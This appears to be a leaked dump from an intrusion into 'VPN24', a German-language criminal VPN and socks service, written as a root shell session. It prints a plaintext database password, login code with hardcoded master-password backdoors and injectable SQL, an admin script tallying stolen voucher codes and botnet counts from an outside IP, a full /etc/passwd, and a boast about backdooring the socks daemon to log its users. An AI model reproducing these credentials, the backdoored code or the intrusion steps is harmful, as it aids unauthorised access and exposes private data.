+<tr><td>6337180259073857611</td><td>Failed</td><td>3.00</td></tr> +<tr><td>6337180256462965609</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180394582246475</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258243666274</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180256212540975</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180257735545855</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250238018710</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180250936554560</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258032831998</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180113239640306</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259568330264</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180254636279981</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255605913872</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251576728091</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180254761736029</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251140051070</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258955781559</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255901612889</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180252316842391</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180255645832702</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180253814896822</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6330302815447899096</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180119686732454</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253644660265</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180257110264619</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180254730527152</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259238856011</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180280592431563</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253125392792</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180258269992836</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253244887904</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180258751189123</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6637180305761777189</td><td>Failed</td><td>25.00</td></tr> +<tr><td>6337180250114063863</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180251763555456</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250613878779</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258831608324</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180254951300131</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180251480953489</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257200821070</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180252910471233</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250992167067</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180113591950418</td><td>Failed</td><td>5.92</td></tr> +<tr><td>6337180253935682366</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254837540264</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251213933840</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253734200352</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257051176442</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259341246183</td><td>Failed</td><td>2.00</td></tr> +<tr><td>6337180250165411383</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6332347911381552324</td><td>Failed</td><td>2.00</td></tr> +<tr><td>6337180254171009637</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250833220976</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180258930519133</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180253725306614</td><td>Failed</td><td>1.30</td></tr> +<tr><td>7180254095966078633</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180258930519133</td><td>Failed</td><td>6.44</td></tr> +<tr><td>6337180255646619421</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6637180250951262628</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255706618537</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6331780259351713338</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180251207309429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251260723060</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254766958230</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251903818657</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180254440921646</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180256430792556</td><td>Failed</td><td>15.00</td></tr> +<tr><td>6337180256307519041</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251553897605</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180256373444637</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180114065134794</td><td>Failed</td><td>8.00</td></tr> + +# cat mysql.php +<?php + $server = "localhost"; + $user = "root"; + $pass = "QkZorIZZC5e"; + $database = "vpn24"; + + mysql_connect($server,$user,$pass); + + if(!$install) + mysql_select_db($database); +?> + +# crazy fuckin masterpassword^C +# cat login.php + +<?php + +if(isset($_SESSION['cmuser'])) + echo("<div style=''>Sie sind bereits eingeloggt als ".$_SESSION['cmuser']."</div>"); +else if(isset($_POST['log'])) +{ + $user = mysql_real_escape_string($_POST['user']); + $pass = mysql_real_escape_string($_POST['pass']); + + if($pass == "koksundnuTTen88" || $pass == "suPPort_masterPass88") + $res = mysql_query("SELECT * FROM cmuser WHERE name='$user'"); + else + $res = mysql_query("SELECT * FROM cmuser WHERE name='$user' AND pass='".md5($pass)."'"); + + $arr = mysql_fetch_array($res); + + if(mysql_num_rows($res) == 0) + die("<div style=''>Konnte dieses User/Passwort Paar nicht finden</div>"); + + $_SESSION['cmuser'] = $arr['name']; + $_SESSION['cmid'] = $arr['id']; + $_SESSION['cmpass'] = md5($pass); + $_SESSION['pPass'] = $arr['privPass']; + $_SESSION['pUser'] = $arr['privUser']; + $_SESSION['poll'] = $arr['poll']; + echo("<div style=''>Sie sind nun eingeloggt als <b>".$_SESSION['cmuser']."</b></div>"); + +} +else +{ +echo <<< END +<div style=""> +<div style="font-weight:bold;font-size:1.7em;">Login</div> +<table> +<form action="index.php?do=login" method="post"> +<tr> +<td>User:</td><td><input class="cInp" type="text" name="user"></td> +</tr> +<tr> +<td>Pass:</td><td><input class="cInp" type="password" name="pass"></td> +</tr> +<br> +</table><br> +<input type="submit" name="log" value="Einloggen"> +</form> +<br><br> +Noch keinen Account? Gleich <a href="index.php?do=register">registrieren</a> +</div> +END; + +} +?> + +# tar cvjf /tmp/cashin.tar.bz2 cashIn/*.php +cashIn/eeeeeeeeee.php +cashIn/myOne.php +cashIn/myukashcombine.php +cashIn/oldPSC.php +cashIn/psc.php +cashIn/ukash666.php +cashIn/ukash_convert666.php + +# cd koksundnuTTen88/ && ls -la +total 152 +drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 . +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 .. +-rw-r--r-- 1 root root 1112 Nov 7 16:29 add5daysadsdsadsayfdsa.php +-rw-r--r-- 1 root root 511 Nov 13 12:48 asd21938uasd213dsa.php +-rw-r--r-- 1 root root 483 Aug 28 02:27 deletevsdata.php +-rw-r--r-- 1 root root 78 Nov 10 20:19 deletevsdata_noreset.php +-rw-r--r-- 1 root root 508 Aug 28 02:45 getAUserCreditsBack.php +-rw-r--r-- 1 root root 235 Jun 25 2010 getSocksUserWithoutAbo.php +-rw-r--r-- 1 root root 441 Jun 28 2010 getVPNUserWithoutAbo.php +-rw-r--r-- 1 root root 14 Jul 10 19:58 index.html +-rw-r--r-- 1 root root 724 Aug 9 17:43 insertShop.php +-rw-r--r-- 1 root root 450 Nov 4 20:29 lu_getVPNUserWithoutAbo.php +-rw-r--r-- 1 root root 5255 Nov 9 20:43 psc.php +-rw-r--r-- 1 www-data root 101 May 7 2010 style.css +-rw-r--r-- 1 www-data root 1924 May 7 2010 viewSupport.php +-rw-r--r-- 1 root root 2021 Nov 9 20:42 viewVsocksSupport.php + +# cat psc.php +<?php + + include("../mysql.php"); + + $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM pscs WHERE pass != '.'") or die(mysql_error()); + $arr = mysql_fetch_array($res); + echo "Es sind <b>".$arr['ci']."</b> PaysafeCards im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>"; + + $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM ukash") or die(mysql_error()); + $arr = mysql_fetch_array($res); + echo "Es sind <b>".$arr['ci']."</b> UkashCodes im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>"; + + + $res = mysql_query("SELECT SUM(credits) AS sc,COUNT(id) AS ci FROM cmuser WHERE id > 26"); + $arr = mysql_fetch_array($res); + + echo "Es sind <b>".$arr['ci']."</b> User registriert welche noch <b>".$arr['sc']." Euro</b> an Credits haben<br>"; + + // socksAcces vpnAccess + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE socksAcces > ".time(0)); + $arr = mysql_fetch_array($res); + echo " <u>Abos:</u> <b>".$arr['ci']."</b> Socks5"; + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE vpnAccess > ".time(0)); + $arr = mysql_fetch_array($res); + echo " / <b>".$arr['ci']."</b> OpenVPN<br><br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM support WHERE seen = 0"); + $arr = mysql_fetch_array($res); + echo "<a style='text-decoration:none;' href='viewSupport.php'>Offene Support Tickets</a>: <b>".$arr['ci']."</b><br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM vsockssupport WHERE seen = 0"); + $arr = mysql_fetch_array($res); + echo "<a style='text-decoration:none;' href='viewVsocksSupport.php'>Vicsocks Lebensanzeige</a>: <b>".$arr['ci']."</b><br><br>"; + + + $res = mysql_query("SELECT SUM(wert) AS ge FROM pscs WHERE pass = '.'"); + $arr = mysql_fetch_array($res); + $gesEarned = $arr['ge']; + $res = mysql_query("SELECT SUM(yesterday) AS ge FROM statistik"); + $arr = mysql_fetch_array($res); + $gesEarnedYes = $arr['ge']; + $res = mysql_query("SELECT SUM(db_yesterday) AS ge FROM statistik"); + $arr = mysql_fetch_array($res); + $gesEarnedDBYes = $arr['ge']; + echo "<span style='color:lime;'><b>Gesamt verdient: $gesEarned (Heute: ".($gesEarned-$gesEarnedYes)." / Gestern: ".($gesEarnedYes-$gesEarnedDBYes).")<br></b></span>"; + + $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT'"); + $arr = mysql_fetch_array($res); + echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> für VicSocks ausgegeben "; + + $earned = floatval($arr['wert']); + $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='vsocks'"); + $arr = mysql_fetch_array($res); + $yest = floatval($arr['yesterday']); + $db_yest = floatval($arr['db_yesterday']); + echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; + + + $res = mysql_query("SELECT COUNT(id) AS ci FROM vsocksData"); + $arr = mysql_fetch_array($res); + $fp = fopen("http://77.91.225.188/asdSDAFqwe1324.php","r"); + $conN = fgets($fp,2048); + fclose($fp); + $fp = fopen("http://77.91.225.188/asdSDAFqwe13372.php","r"); + $conN2 = fgets($fp,2048); + fclose($fp); + + echo " <u>DE Bots:</u> <b>".$arr['ci']."</b> aktiv / <b>".$conN."</b> verfügbar / <b>".$conN2."</b> im Netz <br>"; + echo "<br>"; + + $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT2'"); + $arr = mysql_fetch_array($res); + + echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> im Shop ausgegeben "; + $earned = floatval($arr['wert']); + $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='shop'"); + $arr = mysql_fetch_array($res); + $yest = floatval($arr['yesterday']); + $db_yest = floatval($arr['db_yesterday']); + echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; + + + echo "<b>Noch verfügbar:</b><br>"; + $res = mysql_query("SELECT * FROM shopLayout ORDER BY id"); + + while($arr = mysql_fetch_array($res)) + { + $res2 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."' AND buyer = ''"); + $res3 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."'"); + echo " <b>".mysql_num_rows($res2)."</b>/".mysql_num_rows($res3)." '".$arr['text']."'<br>"; + } + echo "<br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1 OR poll=2 OR poll=3"); + $arr = mysql_fetch_array($res); + echo "Es haben <b>".$arr['ci']."</b> User an der Umfrage teilgenommen<br>"; + echo " <u>Stimmen:</u> "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Lux&Hun / "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=2");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Lux&Off / "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=3");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Hun&Off<br>"; + + + +?> + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Was bieten Sie an? | +| Wir bieten 100% logfreie, sichere und absolut anonyme VPN, SSH | +| Socks und Socks 5 Zugänge in Russland. | +| | +| Wieso kann ich mir so sicher sein dass die Anonymisierung über | +| VPN24 100% logfrei und sicher ist? | +| Wir haben viele Erfahrungen gesammelt da der Service seit | +| 22.12.2009 existiert und er ein offizielles Projekt vom carders.cc| +| Team ist. Wir mieten nur Dedizierte Server bei Anbietern bei denen| +| wir auch zu 100% sicher sind dass diese nicht mit der Polizei | +| kooperieren (deswegen bieten wir als Location erstmal nur Russland| +| an, weitere Locations werden folgen). Außerdem sind die Server | +| 2-fach verschlüsselt und wie schon erwähnt komplett Logfrei. | +|____________________________________________________________________| + +Alright. So we tapped into your russian VPN- and socksserver and shat +brix when looking at your two-times encrypted server. What kind of mad +algorithm from the future are you using? No, lemme guess, AES-0? On +top of that we unfortunately had to reduce the amount of "non-logging" +to about 0% when backdooring your sockd to log http-headers; +strangely, no AES-1337 here either. This gave us a nice round-up of +the people using (and administrating) it and we can't say it was a +surprise. Therefore you find gigabytes of http- and IPlogs neatly +packed and enclosed with the backup. + +# uname -a +Linux vpnsocks 2.6.18-194.26.1.el5.028stab070.14 #1 SMP Thu Nov 18 16:34:01 MSK 2010 x86_64 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/issue +Debian GNU/Linux 5.0 \n \l + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +bind:x:101:104::/var/cache/bind:/bin/false +fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +stunnel4:x:104:106::/var/run/stunnel4:/bin/false +smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +USgK1k659d:x:1000:1000::/home/SSHUSER:/usr/sbin/nologin +vpn24socks:x:1004:1004::/home/vpn24socks:/bin/false +2ee2JLMeiD:x:1005:1005::/home/SSHUSER:/usr/sbin/nologin +jguv7VJ6ii:x:1010:1010::/home/SSHUSER:/usr/sbin/nologin +sOxNXOP2PV:x:1011:1011::/home/SSHUSER:/usr/sbin/nologin +IlE6hFCCQ9:x:1016:1016::/home/SSHUSER:/usr/sbin/nologin +gxCDRFriLl:x:1017:1017::/home/SSHUSER:/usr/sbin/nologin +BulLYDNolq:x:1018:1018::/home/SSHUSER:/usr/sbin/nologin +cEzN80h8BB:x:1020:1020::/home/SSHUSER:/usr/sbin/nologin +A49RKGrvdB:x:1021:1021::/home/SSHUSER:/usr/sbin/nologin +3uUk7DToWo:x:1022:1022::/home/SSHUSER:/usr/sbin/nologin +4MMRD3G8gT:x:1025:1025::/home/SSHUSER:/usr/sbin/nologin +QIhyvtXwum:x:1026:1026::/home/SSHUSER:/usr/sbin/nologin +bX8CG70Z8o:x:1027:1027::/home/SSHUSER:/usr/sbin/nologin +NGHZWVpVuu:x:1028:1028::/home/SSHUSER:/usr/sbin/nologin +MkdEe0NgXc:x:1029:1029::/home/SSHUSER:/usr/sbin/nologin +VP3ofYe5qa:x:1033:1033::/home/SSHUSER:/usr/sbin/nologin +s9wnq4iJbL:x:1035:1035::/home/SSHUSER:/usr/sbin/nologin +JF23IDOEX0:x:1037:1037::/home/SSHUSER:/usr/sbin/nologin +GOE9IvxCo8:x:1038:1038::/home/SSHUSER:/usr/sbin/nologin +2mAWybIfou:x:1039:1039::/home/SSHUSER:/usr/sbin/nologin +ywLRB9sQG5:x:1040:1040::/home/SSHUSER:/usr/sbin/nologin +U5wILkFczX:x:1043:1043::/home/SSHUSER:/usr/sbin/nologin +qU247MmWWp:x:1045:1045::/home/SSHUSER:/usr/sbin/nologin +JpE3P8WgBN:x:1047:1047::/home/SSHUSER:/usr/sbin/nologin +OTx2pkLemc:x:1048:1048::/home/SSHUSER:/usr/sbin/nologin +tLDp1920ug:x:1049:1049::/home/SSHUSER:/usr/sbin/nologin +pzSoTppzAu:x:1052:1052::/home/SSHUSER:/usr/sbin/nologin +fcz40nnjZr:x:1053:1053::/home/SSHUSER:/usr/sbin/nologin +1TEkAllzys:x:1054:1054::/home/SSHUSER:/usr/sbin/nologin +WMfvkEivY0:x:1055:1055::/home/SSHUSER:/usr/sbin/nologin +4Vvq0LAF9r:x:1059:1059::/home/SSHUSER:/usr/sbin/nologin +QVMgMXxSeK:x:1060:1060::/home/SSHUSER:/usr/sbin/nologin +dtxSHwZpH3:x:1061:1061::/home/SSHUSER:/usr/sbin/nologin +Uth54wPUPD:x:1062:1062::/home/SSHUSER:/usr/sbin/nologin +eCWEZEQZVq:x:1064:1064::/home/SSHUSER:/usr/sbin/nologin +wp6WkrrhkH:x:1065:1065::/home/SSHUSER:/usr/sbin/nologin +QLGAfXHUAX:x:1069:1069::/home/SSHUSER:/usr/sbin/nologin +NWPWWWxBnh:x:1070:1070::/home/SSHUSER:/usr/sbin/nologin +LY5yDIThxj:x:1071:1071::/home/SSHUSER:/usr/sbin/nologin +LvJSd7KRCq:x:1072:1072::/home/SSHUSER:/usr/sbin/nologin +DNlBW8cww2:x:1074:1074::/home/SSHUSER:/usr/sbin/nologin +22JAEReAWb:x:1075:1075::/home/SSHUSER:/usr/sbin/nologin +1U7iYfKkZg:x:1076:1076::/home/SSHUSER:/usr/sbin/nologin +A9RlGkkBly:x:1078:1078::/home/SSHUSER:/usr/sbin/nologin +ezjCz5tTLo:x:1080:1080::/home/SSHUSER:/usr/sbin/nologin +CZ298VrwyT:x:1084:1084::/home/SSHUSER:/usr/sbin/nologin +DDFFWPh13H:x:1085:1085::/home/SSHUSER:/usr/sbin/nologin +FwKPqLl9HO:x:1086:1086::/home/SSHUSER:/usr/sbin/nologin +4GA5FfwFEB:x:1090:1090::/home/SSHUSER:/usr/sbin/nologin +6RyUaunr8w:x:1091:1091::/home/SSHUSER:/usr/sbin/nologin +O2cPtoYJSA:x:1092:1092::/home/SSHUSER:/usr/sbin/nologin +OieOTeMsVT:x:1093:1093::/home/SSHUSER:/usr/sbin/nologin +nqh2PPsJoX:x:1094:1094::/home/SSHUSER:/usr/sbin/nologin +vLymjSZ2PC:x:1096:1096::/home/SSHUSER:/usr/sbin/nologin +BB22Ob0wRq:x:1097:1097::/home/SSHUSER:/usr/sbin/nologin +osHYLha9Xa:x:1100:1100::/home/SSHUSER:/usr/sbin/nologin +Mjs6t1fh7r:x:1102:1102::/home/SSHUSER:/usr/sbin/nologin +DEZtQQ9XlX:x:1104:1104::/home/SSHUSER:/usr/sbin/nologin +GIVQTfHrFc:x:1106:1106::/home/SSHUSER:/usr/sbin/nologin +6keWEVe8CF:x:1107:1107::/home/SSHUSER:/usr/sbin/nologin +f4rKlco33u:x:1109:1109::/home/SSHUSER:/usr/sbin/nologin +7iVUdiWpZI:x:1110:1110::/home/SSHUSER:/usr/sbin/nologin +WBuxr9t5xJ:x:1111:1111::/home/SSHUSER:/usr/sbin/nologin +9q9ZUnLTQd:x:1114:1114::/home/SSHUSER:/usr/sbin/nologin +Aw1GQfhx6F:x:1116:1116::/home/SSHUSER:/usr/sbin/nologin +uurtXDhjEU:x:1117:1117::/home/SSHUSER:/usr/sbin/nologin +G7lfd8zf1h:x:1119:1119::/home/SSHUSER:/usr/sbin/nologin +EMY6T7qTGu:x:1120:1120::/home/SSHUSER:/usr/sbin/nologin +IzPTVGc4Yo:x:1123:1123::/home/SSHUSER:/usr/sbin/nologin +4RmVWo7T4v:x:1126:1126::/home/SSHUSER:/usr/sbin/nologin +z9VTnI5JJX:x:1127:1127::/home/SSHUSER:/usr/sbin/nologin +qF7C1TR0he:x:1128:1128::/home/SSHUSER:/usr/sbin/nologin +OxUqFE7v5H:x:1130:1130::/home/SSHUSER:/usr/sbin/nologin +QluTWIEQSG:x:1131:1131::/home/SSHUSER:/usr/sbin/nologin +APi3yQS9Dt:x:1136:1136::/home/SSHUSER:/usr/sbin/nologin +KscYKlIxxP:x:1137:1137::/home/SSHUSER:/usr/sbin/nologin +4OrVVMvg5b:x:1138:1138::/home/SSHUSER:/usr/sbin/nologin +9q9wWck1iv:x:1139:1139::/home/SSHUSER:/usr/sbin/nologin +7T3MmDDuYA:x:1140:1140::/home/SSHUSER:/usr/sbin/nologin +9i3rSA1t3B:x:1141:1141::/home/SSHUSER:/usr/sbin/nologin +OG60AiIy32:x:1142:1142::/home/SSHUSER:/usr/sbin/nologin +XQlGb5EDEX:x:1143:1143::/home/SSHUSER:/usr/sbin/nologin +gSPbDrdVM7:x:1146:1146::/home/SSHUSER:/usr/sbin/nologin +bn1XjaAbBO:x:1148:1148::/home/SSHUSER:/usr/sbin/nologin +eEAGLP58B1:x:1149:1149::/home/SSHUSER:/usr/sbin/nologin +19vuUOl1DA:x:1151:1151::/home/SSHUSER:/usr/sbin/nologin +GJTBqAX0Po:x:1153:1153::/home/SSHUSER:/usr/sbin/nologin +YlKhbzOzlW:x:1155:1155::/home/SSHUSER:/usr/sbin/nologin +P1IEuRFxoc:x:1157:1157::/home/SSHUSER:/usr/sbin/nologin +M74tz0c6cB:x:1159:1159::/home/SSHUSER:/usr/sbin/nologin +pxCR5mWYxl:x:1160:1160::/home/SSHUSER:/usr/sbin/nologin +BYBEFkGPOv:x:1161:1161::/home/SSHUSER:/usr/sbin/nologin +bLQLndsfG7:x:1162:1162::/home/SSHUSER:/usr/sbin/nologin +7RsRZ2UUu4:x:1163:1163::/home/SSHUSER:/usr/sbin/nologin +gbWPMY3QUz:x:1164:1164::/home/SSHUSER:/usr/sbin/nologin +3DPSaYAK0I:x:1165:1165::/home/SSHUSER:/usr/sbin/nologin +Mfa9YHsFwm:x:1167:1167::/home/SSHUSER:/usr/sbin/nologin +MCdvro0waF:x:1168:1168::/home/SSHUSER:/usr/sbin/nologin +4qTipZxa3g:x:1169:1169::/home/SSHUSER:/usr/sbin/nologin +jzJtLApQhG:x:1174:1174::/home/SSHUSER:/usr/sbin/nologin +MfJ1grnWz2:x:1176:1176::/home/SSHUSER:/usr/sbin/nologin +TKTlaudWc6:x:1178:1178::/home/SSHUSER:/usr/sbin/nologin +Pg6UVUT4Zi:x:1179:1179::/home/SSHUSER:/usr/sbin/nologin +7KxfsATvUY:x:1180:1180::/home/SSHUSER:/usr/sbin/nologin +1YzAOqKyJU:x:1181:1181::/home/SSHUSER:/usr/sbin/nologin +ArAdFXiTdV:x:1182:1182::/home/SSHUSER:/usr/sbin/nologin +Tyt6Mxbjb9:x:1183:1183::/home/SSHUSER:/usr/sbin/nologin +p5TdBxcMOd:x:1185:1185::/home/SSHUSER:/usr/sbin/nologin +HCj78QJ6bB:x:1186:1186::/home/SSHUSER:/usr/sbin/nologin +ataiqUNkhi:x:1187:1187::/home/SSHUSER:/usr/sbin/nologin +BDnc11BaRR:x:1189:1189::/home/SSHUSER:/usr/sbin/nologin +0xs05pGnsc:x:1192:1192::/home/SSHUSER:/usr/sbin/nologin +6lCpT6Rtlb:x:1193:1193::/home/SSHUSER:/usr/sbin/nologin +MZGuvPmcQQ:x:1194:1194::/home/SSHUSER:/usr/sbin/nologin +S393KhVsS0:x:1195:1195::/home/SSHUSER:/usr/sbin/nologin +hePPBhA3Zb:x:1196:1196::/home/SSHUSER:/usr/sbin/nologin +xU33BmPZBt:x:1198:1198::/home/SSHUSER:/usr/sbin/nologin +8kTCqMWNer:x:1199:1199::/home/SSHUSER:/usr/sbin/nologin +Z9mwX94DwA:x:1203:1203::/home/SSHUSER:/usr/sbin/nologin +QE70dT7Sk6:x:1207:1207::/home/SSHUSER:/usr/sbin/nologin +3nRGuwyy3O:x:1208:1208::/home/SSHUSER:/usr/sbin/nologin +7lHu9x5ahz:x:1209:1209::/home/SSHUSER:/usr/sbin/nologin +yQt4twcYHi:x:1210:1210::/home/SSHUSER:/usr/sbin/nologin +5QOvATUZRp:x:1211:1211::/home/SSHUSER:/usr/sbin/nologin +qrIJmTNsip:x:1213:1213::/home/SSHUSER:/usr/sbin/nologin +3MD6MyTcBm:x:1214:1214::/home/SSHUSER:/usr/sbin/nologin +tX55vN8iBA:x:1216:1216::/home/SSHUSER:/usr/sbin/nologin +MUF31iM1WD:x:1218:1218::/home/SSHUSER:/usr/sbin/nologin +6I1FTys1aV:x:1219:1219::/home/SSHUSER:/usr/sbin/nologin +wH5nC1icK0:x:1222:1222::/home/SSHUSER:/usr/sbin/nologin +z9GYUjVR9T:x:1224:1224::/home/SSHUSER:/usr/sbin/nologin +uiv8RD7GCm:x:1225:1225::/home/SSHUSER:/usr/sbin/nologin +debug:x:1227:1227::/home/SSHUSER:/usr/sbin/nologin +udewQStk6R:x:1229:1229::/home/SSHUSER:/usr/sbin/nologin +YRfpne3P1W:x:1231:1231::/home/SSHUSER:/usr/sbin/nologin +2G6ixqigXX:x:1232:1232::/home/SSHUSER:/usr/sbin/nologin +FZ6nGPBlnq:x:1234:1234::/home/SSHUSER:/usr/sbin/nologin +N4WUxGoeHX:x:1235:1235::/home/SSHUSER:/usr/sbin/nologin +3qoY48h6od:x:1236:1236::/home/SSHUSER:/usr/sbin/nologin +0KltTgDdxs:x:1237:1237::/home/SSHUSER:/usr/sbin/nologin +KnOIZkAYhv:x:1239:1239::/home/SSHUSER:/usr/sbin/nologin +pduruQrvQw:x:1240:1240::/home/SSHUSER:/usr/sbin/nologin +gfPh6U7BSL:x:1244:1244::/home/SSHUSER:/usr/sbin/nologin +5d4PClWw9W:x:1246:1246::/home/SSHUSER:/usr/sbin/nologin +X3IwwuMhVn:x:1247:1247::/home/SSHUSER:/usr/sbin/nologin +9lKRF8UVul:x:1250:1250::/home/SSHUSER:/usr/sbin/nologin +7OEkZFXfrj:x:1251:1251::/home/SSHUSER:/usr/sbin/nologin +XR9kXMus18:x:1252:1252::/home/SSHUSER:/usr/sbin/nologin +LeJdtNDj0s:x:1253:1253::/home/SSHUSER:/usr/sbin/nologin +sMdDwKbykL:x:1255:1255::/home/SSHUSER:/usr/sbin/nologin +RLPQ9lCkkg:x:1257:1257::/home/SSHUSER:/usr/sbin/nologin +m07JSN8S1t:x:1258:1258::/home/SSHUSER:/usr/sbin/nologin +KoW5ucmliR:x:1259:1259::/home/SSHUSER:/usr/sbin/nologin +vxaNuWuV5A:x:1260:1260::/home/SSHUSER:/usr/sbin/nologin +r6cQANOWcM:x:1261:1261::/home/SSHUSER:/usr/sbin/nologin +GefhxHzMLB:x:1264:1264::/home/SSHUSER:/usr/sbin/nologin +gghzgxMlzK:x:1265:1265::/home/SSHUSER:/usr/sbin/nologin +dTECuvvcnY:x:1267:1267::/home/SSHUSER:/usr/sbin/nologin +teamsocks:x:1268:1268::/home/SSHUSER:/usr/sbin/nologin +2ZzW1TPwek:x:1273:1273::/home/SSHUSER:/usr/sbin/nologin 